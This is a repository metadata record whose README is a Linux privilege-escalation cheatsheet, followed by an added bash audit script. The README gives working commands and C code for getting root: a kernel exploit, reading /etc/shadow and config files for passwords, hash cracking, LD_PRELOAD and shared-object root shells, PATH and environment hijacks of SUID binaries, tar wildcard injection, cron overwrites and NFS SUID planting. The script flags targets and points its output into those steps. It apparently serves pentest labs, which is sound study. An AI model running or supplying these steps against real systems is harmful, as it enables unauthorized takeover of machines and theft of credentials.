{"id":22804340,"url":"https://github.com/divinemonk/linux_privesc_cheatsheet","last_synced_at":"2025-07-09T18:15:38.973Z","repository":{"id":204012860,"uuid":"710914416","full_name":"Divinemonk/linux_privesc_cheatsheet","owner":"Divinemonk","description":"Linux Privilege Escalation: cheatsheet","archived":false,"fork":false,"pushed_at":"2023-10-27T18:07:55.000Z","size":201,"stargazers_count":3,"open_issues_count":0,"forks_count":1,"subscribers_count":2,"default_branch":"m41n","last_synced_at":"2025-04-13T19:49:49.184Z","etag":null,"topics":["cybersecurity","guide","hacking","linux","linux-privilege-escalation","privesc","privilege-escalation"],"latest_commit_sha":null,"homepage":"","language":"Shell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Divinemonk.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null}},"created_at":"2023-10-27T18:02:47.000Z","updated_at":"2024-04-24T01:56:20.000Z","dependencies_parsed_at":null,"dependency_job_id":"1c5764c4-ef0c-4dc3-8963-5c53ff0031c8","html_url":"https://github.com/Divinemonk/linux_privesc_cheatsheet","commit_stats":null,"previous_names":["divinemonk/linux_privesc_cheatsheet"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/Divinemonk/linux_privesc_cheatsheet","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Divinemonk%2Flinux_privesc_cheatsheet","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Divinemonk%2Flinux_privesc_cheatsheet/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Divinemonk%2Flinux_privesc_cheatsheet/releases","manifests_url":"https://repos.ecosyste.ms/api/
v1/hosts/GitHub/repositories/Divinemonk%2Flinux_privesc_cheatsheet/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Divinemonk","download_url":"https://codeload.github.com/Divinemonk/linux_privesc_cheatsheet/tar.gz/refs/heads/m41n","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Divinemonk%2Flinux_privesc_cheatsheet/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":264502358,"owners_count":23618579,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cybersecurity","guide","hacking","linux","linux-privilege-escalation","privesc","privilege-escalation"],"created_at":"2024-12-12T10:07:53.733Z","updated_at":"2025-07-09T18:15:38.914Z","avatar_url":"https://github.com/Divinemonk.png","language":"Shell","funding_links":[],"categories":[],"sub_categories":[],"readme":"# _Linux Privilege Escalation_ cheatsheet\n\u003e the programs/scripts used below (\u0026 more) are in `/tools`\n\n\u003cbr\u003e\n\n## linux-exploit-suggester\n- https://github.com/The-Z-Labs/linux-exploit-suggester\n- *detection*\n  - `./linux-exploit-suggester.sh`\n  - notice the kernel exploits it rates as likely for the running kernel, e.g. dirtycow (CVE-2016-5195)\n- *exploitation*\n  - `gcc -pthread /home/user/tools/dirtycow/c0w.c -o c0w`\n  - `./c0w`\n  - kernel exploits can crash the target; on anything but a lab box try the misconfigurations below first\n\n\n\u003cbr\u003e\n\n## config files (openvpn, irssi, ...)\n- `cat /home/user/myvpn.ovpn`\n- `cat /etc/openvpn/auth.txt`\n- `cat /home/user/.irssi/config | grep -i passw`\n- a password found here is often reused: try it with `su` for root and for the other users in `/etc/passwd`\n\n\n\u003cbr\u003e\n\n## bash history\n- `cat ~/.bash_history | grep -i passw`\n\n\n\u003cbr\u003e\n\n## weak file permissions\n- *detection*\n  - `ls -la /etc/shadow`\n  - notice that `/etc/shadow` is readable by your user (it should be `-rw-r-----` root:shadow or stricter)\n- *exploitation*\n  - __target linux__\n    - save/copy these files\n      - `cat /etc/passwd`\n      - `cat /etc/shadow`\n  - __attacker linux__\n    - `unshadow \u003cPASSWORD-FILE\u003e \u003cSHADOW-FILE\u003e \u003e unshadowed.txt`\n    - `hashcat -m 1800 unshadowed.txt rockyou.txt -O` (`-m 1800` is sha512crypt, the `$6$` hashes; pick the mode that matches the hash prefix)\n\n\n\u003cbr\u003e\n\n
## ssh keys\n- *detection*\n  - `find / -name authorized_keys 2\u003e /dev/null`\n  - `find / -name id_rsa 2\u003e /dev/null`\n  - notice a private key you can read; its location (e.g. `/root/.ssh/`) or a matching `authorized_keys` tells you which account it logs into\n- *exploitation*\n  - __target linux__\n    - save/copy these files\n  - __attacker linux__\n    - `chmod 400 id_rsa`\n    - `ssh -i id_rsa root@\u003cip\u003e`\n\n\n\n\u003cbr\u003e\n\n## sudo \n- *detection*\n  - `sudo -l`\n  - notice the list of programs that can run via sudo, and any `env_keep` entries\n- *exploitation*\n\n### shell escaping\n- https://gtfobins.github.io/\n- look up each program from `sudo -l`: editors, pagers, interpreters and many others can spawn a shell that keeps root\n\n### abusing intended functionality\n- __target linux__\n  - `sudo apache2 -f /etc/shadow` \n  - apache2 rejects the file as a config and echoes the offending first line, which is root's shadow entry\n  - copy root hash\n- __attacker linux__\n  - `echo '[Pasted Root Hash]' \u003e hash.txt`\n  - `john --wordlist=/usr/share/wordlists/nmap.lst hash.txt`\n  - `john --show hash.txt`\n\n### LD_PRELOAD\n- notice `env_keep += LD_PRELOAD` in the `sudo -l` output: sudo passes the variable through, so any program you may run via sudo loads your library as root\n- save following program as (suppose) `x.c`\n```c\n#include \u003cstdio.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003cstdlib.h\u003e\n#include \u003cunistd.h\u003e\n\n/* runs when the library is loaded; drop LD_PRELOAD so the shell starts clean */\nvoid _init() {\n    unsetenv(\"LD_PRELOAD\");\n    setgid(0);\n    setuid(0);\n    system(\"/bin/bash\");\n}\n```\n- `gcc -fPIC -shared -o /tmp/x.so x.c -nostartfiles`\n- `sudo LD_PRELOAD=/tmp/x.so apache2`\n\n\n\u003cbr\u003e\n\n## SUID \n### shared object injection\n- *detection*\n  - `find / -type f -perm -04000 -ls 2\u003e/dev/null`\n  - `strace /usr/local/bin/suid-so 2\u003e\u00261 | grep -i -E \"open|access|no such file\"`\n  - notice a `.so` that the binary tries to open from a directory you can write to and that is missing (`No such file or directory`), here `/home/user/.config/libcalc.so`\n- *exploitation*\n  - `mkdir /home/user/.config`\n  - `cd /home/user/.config`\n  - save following program as `libcalc.c`\n```c\n#include \u003cstdio.h\u003e\n#include \u003cstdlib.h\u003e\n\n/* constructor: runs as soon as the SUID binary loads this library */\nstatic void inject() __attribute__((constructor));\n\nvoid inject() {\n    
system(\"cp /bin/bash /tmp/bash \u0026\u0026 chmod +s /tmp/bash \u0026\u0026 /tmp/bash -p\");\n}\n```\n  - `gcc -shared -o /home/user/.config/libcalc.so -fPIC /home/user/.config/libcalc.c`\n  - `/usr/local/bin/suid-so`\n\n### symlinks\n- *detection*\n  - `dpkg -l | grep nginx`\n  - notice that the installed nginx version is below 1.6.2-5+deb8u3 (CVE-2016-1247: log rotation lets `www-data` swap the error log for a symlink that root then follows)\n- *exploitation*\n  - __target linux 1__\n    - requires a shell as `www-data` (in the lab: `su root`, then `su -l www-data`)\n    - https://github.com/xl7dev/Exploit/blob/master/Nginx/nginxed-root.sh\n      - `/home/user/tools/nginx/nginxed-root.sh /var/log/nginx/error.log`\n    - the exploit now waits for logrotate to run (daily by default)\n  - __target linux 2__\n    - `invoke-rc.d nginx rotate \u003e/dev/null 2\u003e\u00261` as root, to trigger the rotation instead of waiting\n  - __target linux 1__\n    - notice that the exploit continued its execution\n\n### environment variables\n- __type 1__\n  - *detection*\n    - `find / -type f -perm -04000 -ls 2\u003e/dev/null`\n    - make note of all the SUID binaries\n    - `strings /usr/local/bin/suid-env`\n    - notice that the binary runs `service` (or another program) by bare name, so it is resolved through your `PATH`\n  - *exploitation*\n    - `printf '#include \u003cstdlib.h\u003e\\n#include \u003cunistd.h\u003e\\nint main() { setgid(0); setuid(0); system(\"/bin/bash\"); return 0; }\\n' \u003e /tmp/service.c`\n    - `gcc /tmp/service.c -o /tmp/service`\n    - `export PATH=/tmp:$PATH`\n    - `/usr/local/bin/suid-env`\n- __type 2__\n  - *detection*\n    - `find / -type f -perm -04000 -ls 2\u003e/dev/null`\n    - make note of all the SUID binaries\n    - `strings /usr/local/bin/suid-env2`\n    - notice that the binary runs `/usr/sbin/service` by absolute path, so `PATH` does not help; the shell that `system()` spawns has to be abused instead\n  - *exploitation*\n    - __method 1__ (bash older than 4.2-048, which lets a function be named after a path and exported)\n      - `function /usr/sbin/service() { cp /bin/bash /tmp \u0026\u0026 chmod +s /tmp/bash \u0026\u0026 /tmp/bash -p; }`\n      - `export -f /usr/sbin/service`\n      - `/usr/local/bin/suid-env2`\n    - __method 2__ (bash older than 4.4 acting as `/bin/sh`, which still honours `SHELLOPTS=xtrace` and expands `PS4` while running with elevated privileges)\n      - `env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp \u0026\u0026 chown root.root /tmp/bash \u0026\u0026 chmod +s /tmp/bash)' /bin/sh -c '/usr/local/bin/suid-env2; set +x; /tmp/bash -p'`\n\n\n\u003cbr\u003e\n\n## capabilities\n- *detection*\n  - `getcap -r / 2\u003e/dev/null`\n  - notice a binary with the “cap_setuid” capability (e.g. `/usr/bin/python2.6 = cap_setuid+ep`): it may change its uid without being SUID\n- *exploitation*\n  - `/usr/bin/python2.6 -c 'import os; os.setuid(0); os.system(\"/bin/bash\")'`\n\n
## Cron \n### path\n- *detection*\n  - `cat /etc/crontab`\n  - notice the value of the “PATH” variable and a job run by bare name (`overwrite.sh`): cron's shell searches those directories in order, and `/home/user` comes first\n- *exploitation*\n  - `echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' \u003e /home/user/overwrite.sh` where `overwrite.sh` is the name the cron job runs without a path\n  - `chmod +x /home/user/overwrite.sh`\n  - wait until the job runs to give root \u0026 then `/tmp/bash -p`\n\n### wildcards\n- *detection*\n  - `cat /etc/crontab`\n  - notice the script “/usr/local/bin/compress.sh”\n  - `cat /usr/local/bin/compress.sh`\n  - notice the wildcard (*) used by ‘tar’ in a directory you can write to: the shell expands it to file names, and GNU tar treats names beginning with `--` as options\n- *exploitation*\n  - `echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' \u003e /home/user/runme.sh`\n  - `touch /home/user/--checkpoint=1`\n  - `touch /home/user/--checkpoint-action=exec=sh\\ runme.sh`\n  - wait until the job runs to give root \u0026 then `/tmp/bash -p`\n\n### file overwrite\n- *detection*\n  - `cat /etc/crontab`\n  - notice the script “overwrite.sh”\n  - `ls -l /usr/local/bin/overwrite.sh`\n  - notice the file permissions: it is writable by you while cron runs it as root\n- *exploitation*\n  - `echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' \u003e\u003e /usr/local/bin/overwrite.sh`\n  - wait until the job runs to give root \u0026 then `/tmp/bash -p`\n\n\n\u003cbr\u003e\n\n## NFS root squashing\n- *detection*\n  - `cat /etc/exports`\n  - notice that “no_root_squash” option is defined for the “/tmp” export: a remote root is not mapped to nobody, so files it creates on the share stay owned by uid 0\n- *exploitation*\n  - __attacker linux__ (as root, so that the binary you place on the share is root-owned)\n    - `showmount -e \u003ctarget_linux_ip\u003e`\n    - `mkdir /tmp/1`\n    - `mount -o rw,vers=2 \u003ctarget_linux_ip\u003e:/tmp /tmp/1` (drop `vers=2` if the server refuses NFSv2)\n    - `printf '#include \u003cstdlib.h\u003e\\n#include \u003cunistd.h\u003e\\nint main() { setgid(0); setuid(0); system(\"/bin/bash\"); return 0; }\\n' \u003e /tmp/1/x.c`\n    - `gcc /tmp/1/x.c -o /tmp/1/x`\n    - `chmod +s /tmp/1/x`\n  - __target linux__\n    - 
`/tmp/x`\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdivinemonk%2Flinux_privesc_cheatsheet","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fdivinemonk%2Flinux_privesc_cheatsheet","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdivinemonk%2Flinux_privesc_cheatsheet/lists"}
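Added example for the weak-file-permissions, cron and NFS sections of the cheatsheet above. This is not code from the Divinemonk repository: it is a small bash audit script that automates the "notice that ..." steps instead of eyeballing them. It joins passwd and shadow the way `unshadow` does, resolves each cron job command against the crontab's `PATH` the way cron's shell does (so it separates a writable script, the "file overwrite" case, from a bare name you could plant, the "path" case), flags tar wildcards in cron scripts, and lists `no_root_squash` exports. The function names are mine, and everything `build_sample_env` writes (accounts, hashes, crontab, exports) is constructed for the demo; point the functions at `/etc/passwd`, `/etc/shadow`, `/etc/crontab`, the cron scripts and `/etc/exports` on a real target.

```bash
#!/usr/bin/env bash
# privesc_audit.sh: added example, not code from the Divinemonk cheatsheet.
# Automates the "notice that ..." steps of the weak-file-permissions, cron and
# NFS sections. Every function takes file paths, so it can be run against
# /etc/passwd + /etc/shadow, /etc/crontab, a cron script or /etc/exports on a
# target, or against the constructed sample files from build_sample_env.

# --- weak file permissions ---------------------------------------------------
# Join passwd and shadow the way unshadow(8) does: each passwd line with its
# 'x' replaced by the hash from shadow. Accounts whose hash field is '*' or
# starts with '!' (locked, nothing to crack) are dropped.
unshadow_join() {            # $1 = passwd file, $2 = shadow file
  awk -F: 'NR == FNR { hash[$1] = $2; next }
           ($1 in hash) && hash[$1] !~ /^[*!]/ { $2 = hash[$1]; print }' OFS=: "$2" "$1"
}

# --- cron --------------------------------------------------------------------
# Directories of the PATH= line of a system crontab, one per line.
cron_path_dirs() {           # $1 = crontab file
  sed -n 's/^PATH=//p' "$1" | head -n1 | tr ':' '\n'
}

# Commands run by the job lines (field 7, or field 3 for @reboot-style lines).
# Comments, blank lines and VAR=value lines are skipped.
cron_job_commands() {        # $1 = crontab file
  awk '!/^[[:space:]]*(#|$)/ && $1 !~ /^[A-Za-z_][A-Za-z0-9_]*=/ {
         if ($1 ~ /^@/) print $3; else print $7 }' "$1"
}

# One line per job command an unprivileged user could influence:
#   writable <path>   the script itself can be edited ("file overwrite")
#   plantable <path>  the job uses a bare name, and the first PATH directory
#                     that could hold it is writable and does not contain it
#                     ("path"); cron's shell takes the first PATH hit, so a
#                     writable directory after the real script is harmless
cron_job_findings() {        # $1 = crontab file
  local cmd dir candidate path
  path=$(sed -n 's/^PATH=//p' "$1" | head -n1)
  for cmd in $(cron_job_commands "$1"); do
    case "$cmd" in
      /*)  [ -w "$cmd" ] && echo "writable $cmd" ;;
      */*) ;;                # relative to the job's cwd ($HOME); not resolved here
      *)   (IFS=:
            for dir in $path; do
              candidate="$dir/$cmd"
              if [ -e "$candidate" ]; then
                [ -w "$candidate" ] && echo "writable $candidate"
                break
              elif [ -d "$dir" ] && [ -w "$dir" ]; then
                echo "plantable $candidate"
                break
              fi
            done) ;;
    esac
  done
  return 0
}

# Lines of a cron script that hand a shell wildcard to tar: the shell expands
# '*' to the file names in that directory, and GNU tar parses names such as
# --checkpoint-action=exec=... as options.
script_tar_wildcards() {     # $1 = script file
  grep -nE '(^|[[:space:];&|/])tar[[:space:]][^#]*\*' "$1" || true
}

# --- NFS ---------------------------------------------------------------------
# Exports with no_root_squash: a remote root is not mapped to nobody, so files
# it creates on the share (a SUID binary, say) stay owned by uid 0.
exports_no_root_squash() {   # $1 = exports file
  awk '!/^[[:space:]]*#/ && /no_root_squash/ { print $1 }' "$1"
}

# --- constructed sample files (made up for this demo, not from any real host) --
build_sample_env() {         # prints the scratch directory it created
  local d
  d=$(mktemp -d)
  mkdir -p "$d/home/user" "$d/usr/local/bin"
  printf 'root:x:0:0:root:/root:/bin/bash\nuser:x:1000:1000::/home/user:/bin/bash\nsshd:x:105:65534::/run/sshd:/usr/sbin/nologin\n' > "$d/passwd"
  printf 'root:$6$saltsalt$fakehashfakehash:19000:0:99999:7:::\nuser:$6$othersalt$anotherfakehash:19000:0:99999:7:::\nsshd:*:19000:0:99999:7:::\n' > "$d/shadow"
  printf '#!/bin/sh\ncd /home/user\ntar czf /tmp/backup.tgz *\n' > "$d/usr/local/bin/compress.sh"
  chmod 777 "$d/usr/local/bin/compress.sh"   # the weak permission the cheatsheet looks for
  printf 'PATH=%s/home/user:/usr/local/bin:/usr/bin\n' "$d" > "$d/crontab"
  printf '* * * * * root overwrite.sh\n* * * * * root %s/usr/local/bin/compress.sh\n' "$d" >> "$d/crontab"
  printf '# constructed exports\n/tmp *(rw,sync,no_root_squash)\n/srv/data *(rw,sync,root_squash)\n' > "$d/exports"
  echo "$d"
}

if [ "${1:-}" = "--demo" ]; then          # bash privesc_audit.sh --demo
  d=$(build_sample_env)
  echo "== crackable accounts"; unshadow_join "$d/passwd" "$d/shadow"
  echo "== cron findings";      cron_job_findings "$d/crontab"
  echo "== tar wildcards";      script_tar_wildcards "$d/usr/local/bin/compress.sh"
  echo "== no_root_squash";     exports_no_root_squash "$d/exports"
  rm -rf "$d"
fi
```

`bash privesc_audit.sh --demo` runs every check against the constructed files: the sample crontab yields `plantable .../home/user/overwrite.sh` (the bare name that cron would pick up from the first, writable PATH directory) and `writable .../usr/local/bin/compress.sh`, the compress script shows its `tar ... *` line, and only the `/tmp` export is reported. Results are printed from the functions rather than stored, so on a target you can pipe them straight into the exploitation steps of the matching section. Note that `-w` answers for the user running the script; run it as the low-privileged user whose options you are assessing, not as root, or every file will look writable.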